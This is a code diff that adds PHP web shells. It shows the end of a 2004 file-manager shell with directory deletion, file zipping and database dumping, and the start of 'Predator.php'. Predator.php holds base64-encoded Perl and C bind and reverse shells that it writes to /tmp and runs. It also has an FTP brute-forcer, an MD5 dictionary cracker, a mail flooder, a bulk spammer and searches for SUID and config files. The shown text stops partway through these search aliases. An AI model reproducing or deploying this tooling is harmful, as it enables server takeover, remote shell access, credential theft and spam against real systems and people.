+  <tr>
+    <td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
+    <td align="right"><?php
+	debuginfo();
+	ob_end_flush();	
+	?></td>
+  </tr>
+</table>
+</center>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+º¯Êı¿â
+======================================================*/
+
+	// µÇ½Èë¿Ú
+	function loginpage() {
+?>
+<style type="text/css">
+input {font-family: "Verdana";font-size: "11px";BACKGROUND-COLOR: "#FFFFFF";height: "18px";border: "1px solid #666666";}
+</style>
+<form method="POST" action="">
+<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
+<input type="hidden" name="do" value="login">
+<input type="submit" value="Login">
+</form>
+<?php
+		exit;
+	}//end loginpage()
+
+	// Ò³Ãæµ÷ÊÔĞÅÏ¢
+	function debuginfo() {
+		global $starttime;
+		$mtime = explode(' ', microtime());
+		$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+		echo "Processed in $totaltime second(s)";
+	}
+
+	// È¥µôתÒå×Ö·û
+	function stripslashes_array(&$array) {
+		while(list($key,$var) = each($array)) {
+			if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
+				if (is_string($var)) {
+					$array[$key] = stripslashes($var);
+				}
+				if (is_array($var))  {
+					$array[$key] = stripslashes_array($var);
+				}
+			}
+		}
+		return $array;
+	}
+
+	// ɾ³ıĿ¼
+	function deltree($deldir) {
+		$mydir=@dir($deldir);	
+		while($file=$mydir->read())	{ 		
+			if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { 
+				@chmod("$deldir/$file",0777);
+				deltree("$deldir/$file"); 
+			}
+			if (is_file("$deldir/$file")) {
+				@chmod("$deldir/$file",0777);
+				@unlink("$deldir/$file");
+			}
+		} 
+		$mydir->close(); 
+		@chmod("$deldir",0777);
+		return (@rmdir($deldir)) ? 1 : 0;
+	} 
+
+	// Åж϶ÁĞ´Çé¿ö
+	function dir_writeable($dir) {
+		if (!is_dir($dir)) {
+			@mkdir($dir, 0777);
+		}
+		if(is_dir($dir)) {
+			if ($fp = @fopen("$dir/test.txt", 'w')) {
+				@fclose($fp);
+				@unlink("$dir/test.txt");
+				$writeable = 1;
+			} else {
+				$writeable = 0;
+			}
+		}
+		return $writeable;
+	}
+
+	// ±í¸ñĞмäµÄ±³¾°É«Ìæ»»
+	function getrowbg() {
+		global $bgcounter;
+		if ($bgcounter++%2==0) {
+			return "firstalt";
+		} else {
+			return "secondalt";
+		}
+	}
+
+	// »ñÈ¡µ±Ç°µÄÎļşÏµÍ³Â·¾¶
+	function getPath($mainpath, $relativepath) {
+		global $dir;
+		$mainpath_info           = explode('/', $mainpath);
+		$relativepath_info       = explode('/', $relativepath);
+		$relativepath_info_count = count($relativepath_info);
+		for ($i=0; $i<$relativepath_info_count; $i++) {
+			if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
+			if ($relativepath_info[$i] == '..') {
+				$mainpath_info_count = count($mainpath_info);
+				unset($mainpath_info[$mainpath_info_count-1]);
+				continue;
+			}
+			$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
+		} //end for
+		return implode('/', $mainpath_info);
+	}
+
+	// ¼ì²éPHPÅäÖòÎÊı
+	function getphpcfg($varname) {
+		switch($result = get_cfg_var($varname)) {
+			case 0:
+			return "No";
+			break;
+			case 1:
+			return "Yes";
+			break;
+			default:
+			return $result;
+			break;
+		}
+	}
+
+	// ¼ì²éº¯ÊıÇé¿ö
+	function getfun($funName) {
+		return (false !== function_exists($funName)) ? "Yes" : "No";
+	}
+
+	// ѹËõ´ò°üÀà
+	class PHPZip{
+	var $out='';
+		function PHPZip($dir)	{
+    		if (@function_exists('gzcompress'))	{
+				$curdir = getcwd();
+				if (is_array($dir)) $filelist = $dir;
+		        else{
+			        $filelist=$this -> GetFileList($dir);//ÎļşÁбí
+				    foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
+	            }
+		        if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
+				else chdir($curdir);
+				if (count($filelist)>0){
+					foreach($filelist as $filename){
+						if (is_file($filename)){
+							$fd = fopen ($filename, "r");
+							$content = @fread ($fd, filesize ($filename));
+							fclose ($fd);
+						    if (is_array($dir)) $filename = basename($filename);
+							$this -> addFile($content, $filename);
+						}
+					}
+					$this->out = $this -> file();
+					chdir($curdir);
+				}
+				return 1;
+			}
+			else return 0;
+		}
+
+		// »ñµÃÖ¸¶¨Ä¿Â¼ÎļşÁбí
+		function GetFileList($dir){
+			static $a;
+			if (is_dir($dir)) {
+				if ($dh = opendir($dir)) {
+			   		while (($file = readdir($dh)) !== false) {
+						if($file!='.' && $file!='..'){
+            				$f=$dir .'/'. $file;
+            				if(is_dir($f)) $this->GetFileList($f);
+							$a[]=$f;
+	        			}
+					}
+     				closedir($dh);
+    			}
+			}
+			return $a;
+		}
+
+		var $datasec      = array();
+	    var $ctrl_dir     = array();
+		var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	    var $old_offset   = 0;
+
+		function unix2DosTime($unixtime = 0) {
+	        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+		    if ($timearray['year'] < 1980) {
+				$timearray['year']    = 1980;
+        		$timearray['mon']     = 1;
+	        	$timearray['mday']    = 1;
+		    	$timearray['hours']   = 0;
+				$timearray['minutes'] = 0;
+        		$timearray['seconds'] = 0;
+	        } // end if
+		    return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+			        ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+	    }
+
+		function addFile($data, $name, $time = 0) {
+	        $name     = str_replace('\\', '/', $name);
+
+		    $dtime    = dechex($this->unix2DosTime($time));
+	        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+		              . '\x' . $dtime[4] . $dtime[5]
+			          . '\x' . $dtime[2] . $dtime[3]
+				      . '\x' . $dtime[0] . $dtime[1];
+	        eval('$hexdtime = "' . $hexdtime . '";');
+		    $fr   = "\x50\x4b\x03\x04";
+			$fr   .= "\x14\x00";
+	        $fr   .= "\x00\x00";
+		    $fr   .= "\x08\x00";
+			$fr   .= $hexdtime;
+
+	        $unc_len = strlen($data);
+		    $crc     = crc32($data);
+			$zdata   = gzcompress($data);
+	        $c_len   = strlen($zdata);
+		    $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+			$fr      .= pack('V', $crc);
+	        $fr      .= pack('V', $c_len);
+		    $fr      .= pack('V', $unc_len);
+			$fr      .= pack('v', strlen($name));
+	        $fr      .= pack('v', 0);
+		    $fr      .= $name;
+
+			$fr .= $zdata;
+
+	        $fr .= pack('V', $crc);
+		    $fr .= pack('V', $c_len);
+			$fr .= pack('V', $unc_len);
+
+	        $this -> datasec[] = $fr;
+		    $new_offset        = strlen(implode('', $this->datasec));
+
+			$cdrec = "\x50\x4b\x01\x02";
+	        $cdrec .= "\x00\x00";
+		    $cdrec .= "\x14\x00";
+			$cdrec .= "\x00\x00";
+	        $cdrec .= "\x08\x00";
+		    $cdrec .= $hexdtime;
+			$cdrec .= pack('V', $crc);
+	        $cdrec .= pack('V', $c_len);
+		    $cdrec .= pack('V', $unc_len);
+			$cdrec .= pack('v', strlen($name) );
+	        $cdrec .= pack('v', 0 );
+		    $cdrec .= pack('v', 0 );
+			$cdrec .= pack('v', 0 );
+	        $cdrec .= pack('v', 0 );
+		    $cdrec .= pack('V', 32 );
+			$cdrec .= pack('V', $this -> old_offset );
+	        $this -> old_offset = $new_offset;
+		    $cdrec .= $name;
+
+			$this -> ctrl_dir[] = $cdrec;
+	    }
+
+		function file() {
+			$data    = implode('', $this -> datasec);
+	        $ctrldir = implode('', $this -> ctrl_dir);
+		    return
+			    $data .
+				$ctrldir .
+	            $this -> eof_ctrl_dir .
+		        pack('v', sizeof($this -> ctrl_dir)) .
+			    pack('v', sizeof($this -> ctrl_dir)) .
+				pack('V', strlen($ctrldir)) .
+	            pack('V', strlen($data)) .
+		        "\x00\x00";
+	    }
+	}
+
+	// ±¸·İÊı¾İ¿â
+	function sqldumptable($table, $fp=0) {
+		$tabledump = "DROP TABLE IF EXISTS $table;\n";
+		$tabledump .= "CREATE TABLE $table (\n";
+
+		$firstfield=1;
+
+		$fields = mysql_query("SHOW FIELDS FROM $table");
+		while ($field = mysql_fetch_array($fields)) {
+			if (!$firstfield) {
+				$tabledump .= ",\n";
+			} else {
+				$firstfield=0;
+			}
+			$tabledump .= "   $field[Field] $field[Type]";
+			if (!empty($field["Default"])) {
+				$tabledump .= " DEFAULT '$field[Default]'";
+			}
+			if ($field['Null'] != "YES") {
+				$tabledump .= " NOT NULL";
+			}
+			if ($field['Extra'] != "") {
+				$tabledump .= " $field[Extra]";
+			}
+		}
+		mysql_free_result($fields);
+	
+		$keys = mysql_query("SHOW KEYS FROM $table");
+		while ($key = mysql_fetch_array($keys)) {
+			$kname=$key['Key_name'];
+			if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
+				$kname="UNIQUE|$kname";
+			}
+			if(!is_array($index[$kname])) {
+				$index[$kname] = array();
+			}
+			$index[$kname][] = $key['Column_name'];
+		}
+		mysql_free_result($keys);
+
+		while(list($kname, $columns) = @each($index)) {
+			$tabledump .= ",\n";
+			$colnames=implode($columns,",");
+
+			if ($kname == "PRIMARY") {
+				$tabledump .= "   PRIMARY KEY ($colnames)";
+			} else {
+				if (substr($kname,0,6) == "UNIQUE") {
+					$kname=substr($kname,7);
+				}
+				$tabledump .= "   KEY $kname ($colnames)";
+			}
+		}
+
+		$tabledump .= "\n);\n\n";
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+
+		$rows = mysql_query("SELECT * FROM $table");
+		$numfields = mysql_num_fields($rows);
+		while ($row = mysql_fetch_array($rows)) {
+			$tabledump = "INSERT INTO $table VALUES(";
+
+			$fieldcounter=-1;
+			$firstfield=1;
+			while (++$fieldcounter<$numfields) {
+				if (!$firstfield) {
+					$tabledump.=", ";
+				} else {
+					$firstfield=0;
+				}
+
+				if (!isset($row[$fieldcounter])) {
+					$tabledump .= "NULL";
+				} else {
+					$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
+				}
+			}
+
+			$tabledump .= ");\n";
+
+			if ($fp) {
+				fwrite($fp,$tabledump);
+			} else {
+				echo $tabledump;
+			}
+		}
+		mysql_free_result($rows);
+	}
+
+	class FORMS {
+		function tableheader() {
+			echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
+		}
+
+		function headerform($arg=array()) {
+			global $dir;
+			if ($arg[enctype]){
+				$enctype="enctype=\"$arg[enctype]\"";
+			} else {
+				$enctype="";
+			}
+			if (!isset($arg[method])) {
+				$arg[method] = "POST";
+			}
+			if (!isset($arg[action])) {
+				$arg[action] = '';
+			}
+			echo "  <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
+			echo "  <tr>\n";
+			echo "    <td>".$arg[content]."</td>\n";
+			echo "  </tr>\n";
+			echo "  </form>\n";
+		}
+
+		function tdheader($title) {
+			global $dir;
+			echo "  <tr class=\"firstalt\">\n";
+			echo "	<td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·µ»Ø</a>]</b></td>\n";
+			echo "  </tr>\n";
+		}
+
+		function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
+			if ($bgcolor=='2') {
+				$css="secondalt";
+			} elseif ($bgcolor=='1') {
+				$css="firstalt";
+			} else {
+				$css=$bgcolor;
+			}
+			$height = empty($height) ? "" : " height=".$height;
+			$colspan = empty($colspan) ? "" : " colspan=".$colspan;
+			echo "  <tr class=\"".$css."\">\n";
+			echo "	<td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
+			echo "  </tr>\n";
+		}
+
+		function tablefooter() {
+			echo "</table>\n";
+		}
+
+		function formheader($action='',$title,$target='') {
+			global $dir;
+			$target = empty($target) ? "" : " target=\"".$target."\"";
+			echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
+			echo "  <tr class=\"firstalt\">\n";
+			echo "	<td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·µ»Ø</a>]</b></td>\n";
+			echo "  </tr>\n";
+		}
+
+		function makehidden($name,$value=''){
+			echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
+		}
+
+		function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
+			$css = ($css == 'input') ? " class=\"input\"" : "";
+			$input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
+			return $input;
+		}
+
+		function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
+			$textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
+			return $textarea;
+		}
+
+		function formfooter($over='',$height=''){
+			$height = empty($height) ? "" : " height=\"".$height."\"";
+			echo "  <tr class=\"secondalt\">\n";
+			echo "	<td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value=\"È·¶¨\"></td>\n";
+			echo "  </tr>\n";
+			echo " </form>\n";
+			echo $end = empty($over) ? "" : "</table>\n";
+		}
+
+		function makeselect($arg = array()){
+			if ($arg[multiple]==1) {
+				$multiple = " multiple";
+				if ($arg[size]>0) {
+					$size = "size=$arg[size]";
+				}
+			}
+			if ($arg[css]==0) {
+				$css = "class=\"input\"";
+			}
+			$select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
+				if (is_array($arg[option])) {
+					foreach ($arg[option] AS $key=>$value) {
+						if (!is_array($arg[selected])) {
+							if ($arg[selected]==$key) {
+								$select .= "<option value=\"$key\" selected>$value</option>\n";
+							} else {
+								$select .= "<option value=\"$key\">$value</option>\n";
+							}
+
+						} elseif (is_array($arg[selected])) {
+							if ($arg[selected][$key]==1) {
+								$select .= "<option value=\"$key\" selected>$value</option>\n";
+							} else {
+								$select .= "<option value=\"$key\">$value</option>\n";
+							}
+						}
+					}
+				}
+			$select .= "</select>\n";
+			return $select;
+		}
+	}
+?>
\ No newline at end of file
diff --git a/php/Predator.php b/php/Predator.php
new file mode 100644
index 0000000..c3bd3bd
--- /dev/null
+++ b/php/Predator.php
@@ -0,0 +1,1367 @@
+<?php
+$auth = 0;
+
+
+
+ini_set("session.gc_maxlifetime",1);
+session_start();
+error_reporting(0);
+safe_mode();
+$name="9b534ea55d0b82c3a7e80003a84b6865";     //login = 'mylogin'
+$pass="a029d0df84eb5549c641e04a9ef389e5";     //pass  = 'mypass'
+if($auth == 1){
+if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"PanelAccess\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("Access Denied");
+   }
+}
+
+if($_GET['kill']=='yes')
+{
+unlink($_SERVER['SCRIPT_FILENAME']);
+echo "<script>alert('Your shell script was succefully deleted!')</script>";
+}
+
+
+function md5_brute($hash,$log,$dict)
+{
+ignore_user_abort(1);
+set_time_limit(0);
+
+$fl = fopen($dict, "r");
+$fl = fopen($log, "w");
+$count = 0;
+if(!$dict){
+return "Fill 'dictionary_file' field!";
+}if(!$log){
+return "Fill 'log_file' field!";
+}elseif(!strlen($hash) == 0){
+return "Fill 'md5_hash' field!";
+}else{
+	while(!$feof($dict)){
+		$pass = fgets($dict);
+		$brute_hash = md5($pass);
+		if($brute_hash == $hash){
+			fputs($log, "$hash:$pass\n---");
+			fclose($dict);
+			fclose($log);
+			exit;
+		}else{
+			$count = $count + 1;
+			fputs($log, "$count passwords was bruted...");
+		}
+	}
+	fputs($log, "$count passwords are failed!");
+}
+fclose($dict);
+fclose($log);
+}
+
+function port_bind($port,$pass,$method)
+{
+$perl = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+
+if($method=='Perl')
+	{
+		fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl));
+		fclose($i);
+		ex(which("perl")." /tmp/shlbck ".$port." &");
+		unlink("/tmp/shlbck");
+		return ex('ps -aux | grep shlbck');
+	}
+elseif($method=='C#')
+	{
+		fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c));
+		fclose($i);
+		ex("gcc shlbck.c -o shlbck");
+		unlink('shlbck.c');
+		ex("/tmp/shlbck ".$port." ".$pass." &");
+		unlink("/tmp/shlbck");
+		return ex('ps -aux | grep shlbck');
+	}else
+	{
+	return 'Choose method';
+	}
+
+}
+
+function backconnect($ip,$port,$method)
+{
+$perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+if($method=='Perl')
+	{
+		fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl));
+		fclose($i);
+		ex(which("perl")." /tmp/shlbck ".$ip." ".$port." &");
+		unlink("/tmp/shlbck");
+		return ex('netstat -an | grep -i listen');
+	}
+elseif($method=='C#')
+	{
+		fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c));
+		fclose($i);
+		ex("gcc shlbck.c -o shlbck");
+		unlink('shlbck.c');
+		ex("/tmp/shlbck ".$ip." ".$port." &");
+		unlink("/tmp/shlbck");
+		return ex('netstat -an | grep -i listen');
+	}else
+	{
+	return 'Choose method';
+	}
+}
+
+if($_POST['type']==11){download(stripslashes($_POST['value']));};
+
+function download($dfilename)
+{
+	$file=fopen($dfilename,"r");
+	ob_clean();
+    $filename = basename($dfilename);
+    $filedump = fread($file,@filesize($dfilename));
+    fclose($file);
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");   
+    echo $filedump;
+}
+
+function flooder($logf,$to,$from,$subject,$msg,$amount,$check)
+{
+ignore_user_abort(1);
+set_time_limit(0);
+
+$fl = fopen($logf, "w");
+$count = 0;
+if(!$logf){
+return "Fill 'log_file' field!";
+}elseif(!$to){
+return "Fill 'Send to' field!";
+}elseif(!$from){
+return "Fill 'From' field!";
+}elseif(!$subject){
+return "Fill 'Subject' field!";
+}elseif(!$msg){
+return "Fill 'Message' field!";
+}elseif(!$amount){
+return "Fill 'Amount' field!";
+}else{
+	while($count < $amount){
+		mail("$to", "$subject", "$msg", "From: $from");
+		$count = $count + 1;
+		$fl = fopen($logf, "w");
+		fputs($fl, "$count flood-letters was sended...");
+		fclose($fl);	
+	}
+	if(strlen($check) != 0){
+		$check_text = "Done! $count flood-letters was sended!";
+		$check_sub = 'Check';
+		mail("$check", "$check_sub", "$check_text", "From: $from");
+		$fl = fopen($logf, "w");
+		fputs($fl, "Done! $count flood-letters was sended!");
+	}
+	else{
+		$fl = fopen($logf, "w");
+		fputs($fl, "Done! $count flood-letters was sended!");
+	}
+}
+fclose($fl);
+}
+
+function ftp_brute($host,$ftp_users,$ftp_passwd,$ftp_log)
+{
+ignore_user_abort(1);
+set_time_limit(0);
+
+$fl = fopen($ftp_users, "r");
+$fd = fopen($ftp_passwd, "r");
+$fr = fopen($ftp_log, "a+");
+if(!$host){
+return "Fill 'Host' field!";
+}elseif(!$ftp_users){
+return "Fill 'ftp_users file' field!";
+}elseif(!$ftp_passwd){
+return "Fill 'ftp_passwd file' field!";
+}elseif(!$ftp_log){
+return "Fill 'ftp_log file' field!";
+}elseif(!file_exists($ftp_users)){
+return "File ".$ftp_users." doesn't exists!";
+}elseif(!file_exists($ftp_passwd)){
+return "File ".$ftp_passwd." doesn't exists!";
+}
+else{
+	while(!feof($fd)){
+        	$pass = fgets($fd);
+                	while(!feof($fl)){
+                        	$user = fgets($fl);
+                                $connect = ftp_connect($host);
+                                if(!$connect){
+                                	fputs($fr, "Enable connect to $host\n");
+                                        exit;
+                                }else{
+                                	$auth = ftp_login($connect, $user, $pass);
+                                	if(!$auth){
+                                		ftp_quit($connect);
+                                	}
+                                	else{
+                                		fputs($fr, "$host:\n---$login:$pass\n---");
+                                		ftp_quit($connect);
+                                	} 
+                                }
+                	}
+	}
+	fputs($fr, "Done:\n");
+	fclose($fr);
+}
+fclose($fl);
+fclose($fd);
+}
+
+function spammer($from,$subject,$msg,$check,$elist,$logf)
+{
+ignore_user_abort(1);
+set_time_limit(0);
+
+$fp = fopen($elist. "r");
+$fl = fopen($logf, "w");
+$count = 0;
+if(!$from){
+return "Fill 'From' field!";
+}elseif(!$elist){
+return "Fill 'Emails list' field!";
+}elseif(!$logf){
+return "Fill 'Log File' field!";
+}elseif(!$msg){
+return "Fill 'Message' field!";
+}elseif(!$subject){
+return "Fill 'Subject' field!";
+}elseif(!file_exists($elist)){
+return "File ".$elist." doesn't exists!";
+}else{
+	while(!feof($fp)){
+		$to = fgets($fp);
+		mail("$to", "$subject", "$msg", "From: $from");
+		$count = $count + 1;
+		$fl = fopen($logf, "w");
+		fputs($fl, "$count letters was sended...");
+		fclose($fl);
+	}
+	if(strlen($check) != 0){
+		$check_text = "Done! $count letters was sended!";
+		$check_sub = 'Check';
+		mail("$check", "$check_sub", "$check_text", "From: $from");
+		$fl = fopen($logf, "w");
+		fputs($fl, "Done! $count letters was sended!\n");
+	}
+	else{
+		$fl = fopen($logf, "w");
+		fputs($fl, "Done! $count letters was sended!");
+	}
+}
+fclose($fp);
+fclose($fl);
+}
+
+function alias($in)
+{
+if($in=="find apahce config file"){return ex('find / -type f -name httpd.conf');}
+elseif($in=="find access_log files"){return ex('find / -type f -name access_log');}
+elseif($in=="find error_log files"){return ex('find / -type f -name error_log');}
+elseif($in=="find suid files"){return ex('find / -type f -perm -04000 -ls');}
+elseif($in=="find suid files in current dir"){return ex('find . -type f -perm -04000 -ls');}
+elseif($in=="find sgid files"){return ex('find / -type f -perm -02000 -ls');}
+elseif($in=="find sgid files in current dir"){return ex('find . -type f -perm -02000 -ls');}
+elseif($in=="find config.inc.php files"){return ex('find / -type f -name config.inc.php');}
+elseif($in=="find config.inc.php files in current dir"){return ex('find . -type f -name config.inc.php');}
+elseif($in=="find config* files"){return ex('find / -type f -name "config*"');}
+elseif($in=="find config* files in current dir"){return ex('find . -type f -name "config*"');}
+elseif($in=="find all writable files"){return ex('find / -type f -perm -2 -ls');}
